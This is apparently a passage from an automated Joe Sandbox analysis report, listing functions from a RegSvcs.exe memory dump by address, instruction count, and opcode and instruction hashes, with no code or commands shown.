                                                              • Instruction ID: 3a9ae2ed893acd4f48c78bffe37d2d7280fa387b190e071a274bfdf9ad7cd18a
                                                              • Opcode Fuzzy Hash: 60393afba14e049b12507103a45d156843150894717b28434ec12c8c6b971a73
                                                              • Instruction Fuzzy Hash: 0F51E2B09402179FDF259B28CC00BADBBB1FF51314F0482A9E529AF2C2E7349985CF41
                                                              Function 01590BCD Relevance: .1, Instructions: 130COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 065f4ea83e493cbd7a352b70e54527e42f6933eadb44f63f2935546a5d6331d8
                                                              • Instruction ID: be6759b927ca8d84360199517c01d9a904e6ac02911e547b5526eb17e9e19a71
                                                              • Opcode Fuzzy Hash: 065f4ea83e493cbd7a352b70e54527e42f6933eadb44f63f2935546a5d6331d8
                                                              • Instruction Fuzzy Hash: F0419171E502699BCF21DF68C945BEEB7B8FF44740F4104A9E908AF281D6349E80CB92
                                                              Function 01590D59 Relevance: .1, Instructions: 130COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c1d9e6a94f78fe2698797307ea0f8c4d2676ae1201ed83ba8f4d778d57798edd
                                                              • Instruction ID: 6e1e46b2cf084a6e00e8f3dbc412c8c0e0fb300d54086dda52c0294441d60ac4
                                                              • Opcode Fuzzy Hash: c1d9e6a94f78fe2698797307ea0f8c4d2676ae1201ed83ba8f4d778d57798edd
                                                              • Instruction Fuzzy Hash: A941B271A00315AFEF319F28CC80BAEB7EABB55614F04089AF9459F281DB70ED40CB52
                                                              Function 0165866E Relevance: .1, Instructions: 129COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                              • Instruction ID: 8305dfadeb35edb66cb17332fee82faddb3e27398b48492b07160a8488b2a2b3
                                                              • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                              • Instruction Fuzzy Hash: B9419275B00216EBEB55DF9ACC84ABFBBBEAF88610F144069ED04A7741DB70DD0187A0
                                                              Function 01590887 Relevance: .1, Instructions: 128COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0956f708fdaa2789859586bde1f93c02472487af20c459bea703a33a7a88d9d9
                                                              • Instruction ID: c6fe07b591c91e7404d29eb6b6e8a036e7fa8e69d0edbefb1a6d6c15f9d73df5
                                                              • Opcode Fuzzy Hash: 0956f708fdaa2789859586bde1f93c02472487af20c459bea703a33a7a88d9d9
                                                              • Instruction Fuzzy Hash: 874193716007029FDB25CF28C480A2AB7F9FF49314B144E6DE5578FA91E730E455CB91
                                                              Function 015BA470 Relevance: .1, Instructions: 127COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b3c60f618da854fd0a15354616aea0aca8a9f3e64ff72aaa9ef0e4676f2a2717
                                                              • Instruction ID: 47ddee41c3efb3c4f97e118837b5bbf147a36cb7740a2d3b7e7e03c9c57eef7c
                                                              • Opcode Fuzzy Hash: b3c60f618da854fd0a15354616aea0aca8a9f3e64ff72aaa9ef0e4676f2a2717
                                                              • Instruction Fuzzy Hash: 9141A932A40206DFDF25DF6CD995BEE7BB0FB98364F040669D511AF291DB349A00CBA0
                                                              Function 01598BF0 Relevance: .1, Instructions: 124COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 49850f81fc5788294eeab1c3aca20d2b8035ebc158e1ce919e0f3001c716c1a4
                                                              • Instruction ID: 8ae084aeba7c75738b72042438a40856f8b7a23beaf46fef44f137a54638c6db
                                                              • Opcode Fuzzy Hash: 49850f81fc5788294eeab1c3aca20d2b8035ebc158e1ce919e0f3001c716c1a4
                                                              • Instruction Fuzzy Hash: 1041DC72A0020BDBDB249F5CCC80B6EBBB5FBD6604F14822ED9019F255DB75D842CB92
                                                              Function 01588918 Relevance: .1, Instructions: 123COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1d5384ba3a35cf239ed29770a8441ad3ae7cae8734af15c7dcbdd40d6fc77b50
                                                              • Instruction ID: bf8817853371ed31a2ef738938fbaa6873e2f2b4a6a3c1e7b5c02d95cb3bfbb4
                                                              • Opcode Fuzzy Hash: 1d5384ba3a35cf239ed29770a8441ad3ae7cae8734af15c7dcbdd40d6fc77b50
                                                              • Instruction Fuzzy Hash: EA413F319187169ED312EF65C880A6FB6E9FF84B54F40092AF984DB150E731DE458BA3
                                                              Function 0158A020 Relevance: .1, Instructions: 122COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                              • Instruction ID: 0e9c0452081a80805aa432730dab2f8c18e5c1a638061d9712a5a2516fe2aa2e
                                                              • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                              • Instruction Fuzzy Hash: 45416E31E00212DBEB15EE5884847BEB7F1FB90752F15806BEA60AF241D6329D41C791
                                                              Function 015909AD Relevance: .1, Instructions: 122COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 416f7197c79eaf56adc66a6f13d9407264e5a000e3344d329527d1b3cf26d072
                                                              • Instruction ID: 35feeee73ccf909afd49dc68d79ee9981ba9cfcf05319c6ba1b974f359495a20
                                                              • Opcode Fuzzy Hash: 416f7197c79eaf56adc66a6f13d9407264e5a000e3344d329527d1b3cf26d072
                                                              • Instruction Fuzzy Hash: 84416D71A40601EFDB21CF18C840B2ABBF9FF54314F648A6AE549CF291E775E941CB91
                                                              Function 015C0710 Relevance: .1, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                              • Instruction ID: 628f4724648fa90801fed71e3e8f734c5d6c77cdb5af23388a039701c86970c6
                                                              • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                              • Instruction Fuzzy Hash: AB410B75A00605EFDB24CF98C990AAABBF4FF18B00B10496DE556DB691D330EA44CF50
                                                              Function 0159262C Relevance: .1, Instructions: 119COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6d5b78d441e01a2be4faf7806b293697191b80c5483547aa263c69406269a583
                                                              • Instruction ID: 7eeb0d9b0821ad85880af56758298f457df61f59e0b4bb80475bb3a9dee628e0
                                                              • Opcode Fuzzy Hash: 6d5b78d441e01a2be4faf7806b293697191b80c5483547aa263c69406269a583
                                                              • Instruction Fuzzy Hash: 5141B3B0901701EFCB25EF28D940B6DB7F5FF85314F148699C50AAF6A1DB30A941CB92
                                                              Function 015CC8F9 Relevance: .1, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6af99f67b4715387e04434fbab926f59304562c41cdc6261149bc154829c44ea
                                                              • Instruction ID: daa7a6a6a2d14ca48aba102a41b65c8b95a0216df6a1d8150370eb8de28bc961
                                                              • Opcode Fuzzy Hash: 6af99f67b4715387e04434fbab926f59304562c41cdc6261149bc154829c44ea
                                                              • Instruction Fuzzy Hash: 623199B1A01346DFDB12CFA8C840799BBF4FB48B14F2085AED109EB291D3729902CF90
                                                              Function 016107C3 Relevance: .1, Instructions: 114COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7ab1d6784a73862638d72ecb872ab0a92d31fc4012a4fd0611a2bda6c08ba438
                                                              • Instruction ID: 25d5462f20f27d59547add1a54cbb5c4a6bf85a6a9d2ebf8b0366d6c9c7085b0
                                                              • Opcode Fuzzy Hash: 7ab1d6784a73862638d72ecb872ab0a92d31fc4012a4fd0611a2bda6c08ba438
                                                              • Instruction Fuzzy Hash: A4417C72508301AFD760DF29C845B9BBBE8FF88654F004A2EF998DB251D7709945CB92
                                                              Function 016105A7 Relevance: .1, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c406b0e7e41d936d4778cec3c4bbc860297e966136e0cc070ea29fdfa500d700
                                                              • Instruction ID: 9d60a4706705bedbc87fdded81d73ecb7450b4e36a4e6139185fb973b2b4ed8b
                                                              • Opcode Fuzzy Hash: c406b0e7e41d936d4778cec3c4bbc860297e966136e0cc070ea29fdfa500d700
                                                              • Instruction Fuzzy Hash: 3541CE726047529FC720DF6CDC40A6AB7E9BFC8700F184A2DF9949B694E730E944C7A6
                                                              Function 01594859 Relevance: .1, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 135a5c925493e02d2fbab9fe1deaeff5430f9ad216b24217c77fd5bd8c901c9f
                                                              • Instruction ID: 9024f4cf6a57b676d749a1c4610afbb83d0e60c06d3c87aae8483372a339c8d8
                                                              • Opcode Fuzzy Hash: 135a5c925493e02d2fbab9fe1deaeff5430f9ad216b24217c77fd5bd8c901c9f
                                                              • Instruction Fuzzy Hash: FE41B0306003029BDB25DF28DA94B2EBBEAFF80354F14452DEA458F291DB30DC52CB92
                                                              Function 015A02E1 Relevance: .1, Instructions: 106COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                              • Instruction ID: 9e6ab09bb6f76491dca945d1fc6463e241447437b338234968dd061f534165b1
                                                              • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                              • Instruction Fuzzy Hash: 6B31D331A54245ABDB118B68CC40BAFBBE9BF54350F0445A6F455DF392D6749884CBA0
                                                              Function 0163E3DB Relevance: .1, Instructions: 105COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7d81d7e09d687e3cb92197f7251b206378029e68a5bd6cb48a124e8c26811f31
                                                              • Instruction ID: d0dbddabc90b9fb2904f58dc1ee5a41d636340923f5d1a3940fbb1ad3d68a080
                                                              • Opcode Fuzzy Hash: 7d81d7e09d687e3cb92197f7251b206378029e68a5bd6cb48a124e8c26811f31
                                                              • Instruction Fuzzy Hash: E7319631B51707ABD7229F658C91FAF7AA9BBD8B50F000068F600AF391DAA5DD05C7A0
                                                              Function 01644B4B Relevance: .1, Instructions: 104COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 12430a0306cda981050e6c9ea7b73217e448ad9f090b86053836558c2d247b35
                                                              • Instruction ID: c5503bf3b3182bcc6ba0da493642dadb33a9c2356111986881e9b5e5cc108fcc
                                                              • Opcode Fuzzy Hash: 12430a0306cda981050e6c9ea7b73217e448ad9f090b86053836558c2d247b35
                                                              • Instruction Fuzzy Hash: 6231EF322452019FC321DF19DC81F2AB7E6FF84360F0A446EE9959B751DB30A810CB84
                                                              Function 01594260 Relevance: .1, Instructions: 102COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 96fba42434c57b599ab243d9d9ad6b8dd9a3fc8c70aa2b50c04e7cf7c879ef64
                                                              • Instruction ID: 9305338738b328e3343cea0040150bc9eb4d82f0e46e56e24a7e09d0daf9bed0
                                                              • Opcode Fuzzy Hash: 96fba42434c57b599ab243d9d9ad6b8dd9a3fc8c70aa2b50c04e7cf7c879ef64
                                                              • Instruction Fuzzy Hash: 2D41A275200B45DFDB22CF28C981B9A7BEABF45314F04481DE6598F291D774E841CBA1
                                                              Function 01644BB0 Relevance: .1, Instructions: 101COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2324623c0886e44a3692bfe65038024eba9d9c433f47cc36534b440ee77f58ba
                                                              • Instruction ID: b659ac27cc17f0b4a1772058114fa9030134a689dcc332ebd85fd27676a83a76
                                                              • Opcode Fuzzy Hash: 2324623c0886e44a3692bfe65038024eba9d9c433f47cc36534b440ee77f58ba
                                                              • Instruction Fuzzy Hash: 9C317A716043029FD320DF29CC82B2AB7E5FB84720F09496DE9959B791EB30E815CB95
                                                              Function 0160EB1D Relevance: .1, Instructions: 100COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 36131bd5766ae502713355705deaca2375a188c7accf7f51837a9eb6605a69f1
                                                              • Instruction ID: 83dcee49ed9426befb8a71999556353c514772d5ac427ea1502f7c552ab1311e
                                                              • Opcode Fuzzy Hash: 36131bd5766ae502713355705deaca2375a188c7accf7f51837a9eb6605a69f1
                                                              • Instruction Fuzzy Hash: 8531EA71241A92DBF32B579CCE48B16BBD8FB40784F1D08A4EB458B7D1DB69D841C270
                                                              Function 016561C3 Relevance: .1, Instructions: 97COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ccbb2650be16b56bb5b75d9e99cfb0e5c4e39943c0a6aa5b1de19c66804f9773
                                                              • Instruction ID: 419bc9855d4670d45dba471bb060f7ab3f3a9a5f80f9fb7ba75986456df422fb
                                                              • Opcode Fuzzy Hash: ccbb2650be16b56bb5b75d9e99cfb0e5c4e39943c0a6aa5b1de19c66804f9773
                                                              • Instruction Fuzzy Hash: A531A175A0025AEBDB15DF98CC40FAEB7B5FB44B80F858169E900EB254D770ED41CBA4
                                                              Function 0163483A Relevance: .1, Instructions: 96COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0f75bb0275caec53d7f356e5476f36516aca5c2711879d5955fff8c74132605d
                                                              • Instruction ID: 60ac3a45ae126afa241d3b1c8d0625e1feebf95f9ae5aa669de5136e5763717d
                                                              • Opcode Fuzzy Hash: 0f75bb0275caec53d7f356e5476f36516aca5c2711879d5955fff8c74132605d
                                                              • Instruction Fuzzy Hash: 68313076A4012DABCF21DF58DC84BDEBBBAABD8350F1401E5A508A7250DB34DE918F90
                                                              Function 015BEB20 Relevance: .1, Instructions: 96COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fcbe5284c0dffe1f9e68617a914b9728e46d88669c3456c5c8449cd1eeabb255
                                                              • Instruction ID: 6f3fd55c8917c349c1a2385c35ad20a8d698fe941e9db171141f9abb16062f03
                                                              • Opcode Fuzzy Hash: fcbe5284c0dffe1f9e68617a914b9728e46d88669c3456c5c8449cd1eeabb255
                                                              • Instruction Fuzzy Hash: C431C972E00215AFDB31DFA9CC81AEEBBF9FF44750F054466E515DB250D6709E008BA0
                                                              Function 016560B8 Relevance: .1, Instructions: 95COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: efb381f8c262c7ec4c31595136c8a7f5d262e9aef5d44e0e5fb040de821c9239
                                                              • Instruction ID: 0ed8d8c656f10431c76010a1adf9c5997cad602f54bd229dc1ef175ba2043574
                                                              • Opcode Fuzzy Hash: efb381f8c262c7ec4c31595136c8a7f5d262e9aef5d44e0e5fb040de821c9239
                                                              • Instruction Fuzzy Hash: 2131C071A40606AFDB22AFADCC50B7EB7BABF84755F404169E906DB352DA70DC01CB90
                                                              Function 015907AF Relevance: .1, Instructions: 95COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c716de0ffd11ac6b246ff4ea0ff66152378b2eb19f8e74b812309f3a59c3bbc5
                                                              • Instruction ID: ee5132bc7dd2192b0878f469394649bfb3f947f1842d6634685465aa19dcc5e2
                                                              • Opcode Fuzzy Hash: c716de0ffd11ac6b246ff4ea0ff66152378b2eb19f8e74b812309f3a59c3bbc5
                                                              • Instruction Fuzzy Hash: 59319372B04612DBCB12DE24C89096BBBE9FFD4650F054969FD59AF290DA30DC1187E2
                                                              Function 01598550 Relevance: .1, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 82d9b2c960364ab4244fd2055d9acaa2bc57747c0a1e0050dc8d3720a811256c
                                                              • Instruction ID: af415e29defa61a62dcfa92e45d46fa67d3a56923cbcc74660278cb8de10581a
                                                              • Opcode Fuzzy Hash: 82d9b2c960364ab4244fd2055d9acaa2bc57747c0a1e0050dc8d3720a811256c
                                                              • Instruction Fuzzy Hash: CE3181B26053019FE720CF19C840B1BBBE9FB98700F05496DEA849B791D770E848CB92
                                                              Function 015CA6C7 Relevance: .1, Instructions: 92COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                              • Instruction ID: fabc4e77b77589bbb3955aa63cf91d37c269d50430105476ee2a9e0ae352542f
                                                              • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                              • Instruction Fuzzy Hash: CC3128B2B00B05AFD765CFADCE40B57BBF8BB48A50F04092DA59AC7650F730E9008B60
                                                              Function 0163EBD0 Relevance: .1, Instructions: 91COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a749469d350c49db5137aefa095754efb7a92d986243e7547c21a713910be63d
                                                              • Instruction ID: e3b41fbae8fd990d5df375d05923d88b6e6d30ae35ec41b7eaf314ed9fcf32db
                                                              • Opcode Fuzzy Hash: a749469d350c49db5137aefa095754efb7a92d986243e7547c21a713910be63d
                                                              • Instruction Fuzzy Hash: 7331BA71A453029FC711EF19C94095EBBF1FFC9614F444AAEE498AB311E332D946CBA2
                                                              Function 015B438F Relevance: .1, Instructions: 89COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 044ad5b1a0bb5b6a3409d33c9bcb9396646afbed8cac5d7a9aa870148998fc03
                                                              • Instruction ID: e8d985714a8942c922c8246b987f7541a331f7068884c439e204edc4bd9ad084
                                                              • Opcode Fuzzy Hash: 044ad5b1a0bb5b6a3409d33c9bcb9396646afbed8cac5d7a9aa870148998fc03
                                                              • Instruction Fuzzy Hash: 2231C271B00206DFD720DFA8C9C0AAEBBFABB84304F008529D246DB655D734E941CBA0
                                                              Function 0158CB7E Relevance: .1, Instructions: 89COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                              • Instruction ID: 70cfd37bdfcabfa8a573d477fd7fee16a44a9ce7245c822f990a49c7d53baa47
                                                              • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                              • Instruction Fuzzy Hash: 9B21F232E4065BAADB14ABB9C840BEFBBF5BF54740F0584369A15FF240E270C90087A0
                                                              Function 0158C156 Relevance: .1, Instructions: 88COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3ab973030ae61fae93221a0e66ba99335b7732e33128477711f5c867aac80dc3
                                                              • Instruction ID: 019b7044cf6f597bb313b184c5bd822e45d7ad90d58f1c890e16f88be260d47f
                                                              • Opcode Fuzzy Hash: 3ab973030ae61fae93221a0e66ba99335b7732e33128477711f5c867aac80dc3
